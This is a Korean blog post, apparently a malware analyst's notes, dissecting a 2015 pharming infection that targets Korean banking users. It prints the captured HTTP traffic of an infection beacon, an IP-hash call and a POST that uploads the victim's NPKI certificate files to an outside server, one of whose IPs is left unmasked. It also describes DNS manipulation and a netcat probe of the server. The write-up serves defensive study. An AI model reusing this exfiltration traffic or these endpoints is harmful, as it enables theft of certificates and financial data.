users.qzone.qq.com 파밍

GET /fcg-bin/cgi_get_portrait.fcg?uins=230*******?=7559 HTTP/1.1 Accept: */* Accept-Language: ko Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705) Host: users.qzone.qq.com Connection: Keep-Alive HTTP/1.1 200 OK Server: QZHTTP-2.37.1 Content-Encoding: gzip Cache-Control: max-age=86400 Content-Type: text/html Content-Length: 119 Date: Fri, 10 Apr 2015 06:02:25 GMT Connection: keep-alive Vary: Accept-Encoding ..........+./*)J.,qN..qJL...V2260...0.0R..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T21.32..3..R.@..ZM..9..|...

원래 HOST Address가 r.qzone.qq.com인데 요즘은 r.qzone.qq.com이 아닌 users.qzone.qq.com으로 변경된 듯 싶다.

r.qzone.qq.com으로 접속하면 nickname 등등 잘 떴는데 요즘은 ERROR를 뱉어준다.

무튼 qzone쪽이 바뀐건지.. 모르겠지만 파밍이 새롭게 바뀌어 유포되고 있다.

기능은 기존의 파밍과 똑같다.

GET /Count.asp?ver=001&mac=00-**-42-55-**-A4 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.com****.com/Count.asp?ver=001&mac=00-**-42-55-**-A4 Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.com****.com Cache-Control: no-cache HTTP/1.1 200 OK Date: Fri, 10 Apr 2015 06:02:26 GMT Server: Microsoft-IIS/6.0 Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDCSAQTCSC=BHCANKBDIIPELCGFNPOLKJBA; path=/ Cache-control: private

첫 번재로, Count.asp에 접속하여 감염 기록을 서버에 전송 및 저장한다.

GET /ip.php?=18989 HTTP/1.1 Accept: */* Accept-Language: ko Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705) Host: 43.249.28.*** Connection: Keep-Alive HTTP/1.1 200 OK Connection: close Date: Fri, 10 Apr 2015 06:02:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Content-type: text/html 5b3412f55ff8ec4bd2a99b059084256d

두 번째로, ip.php에 접속하여 ip를 hash한다.

POST /upload.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://43.249.28.248/upload.php Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314 Content-Length: 295 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: 43.249.28.*** Cache-Control: no-cache -----------------------------7da3e1bd0314 Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\nopsled\LOCALS~1\Temp\35c5c8545035186fd745d56e11d8692c.zip" Content-Type: application/x-zip-compressed PK.................... -----------------------------7da3e1bd0314-- HTTP/1.1 200 OK Connection: close Date: Fri, 10 Apr 2015 06:02:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Content-Type:text/html;charset=utf-8

upload.php를 이용하여 NPKI(공인인증서)를 업로드한다.

네이버에 접속하였을때 ESTABLISHED되어 있는 IP가 네이버의 IP와 달랐으며 해당 IP를 가지고 whois 조회시 HK로 조회되었음

그리고 DNS를 조작하여 사용자들의 금융정보를 탈취한다.

C:\>nc 43.249.28.*** 80 GET / HTTP/1.1 Host : naver.com HTTP/1.1 200 OK Connection: close Date: Fri, 10 Apr 2015 07:47:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Content-type:text/html;charset=utf-8 IP 媛쒖닔??: 7174 媛??щ씪?붿뒿?덈떎. C:\>

분석하다가 파밍 IP가 여기여서 netcat으로 host바꿔서 연결해봤는데 무슨 이상한 내용이 뜬다.

이게 뭐지... IP 개수는 7174개 올라왔습니다.

처음 보는 파밍이다.

관리서버인가..

분석하다가 IP가 바뀌어 분석 중단